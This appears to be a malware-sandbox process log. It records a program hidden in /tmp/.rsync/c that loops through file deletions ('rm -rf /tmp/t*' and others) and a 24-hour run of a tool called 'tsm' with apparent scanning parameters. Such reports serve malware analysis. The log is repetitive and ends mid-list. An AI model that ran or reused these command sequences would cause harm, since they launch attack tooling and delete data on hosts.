File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

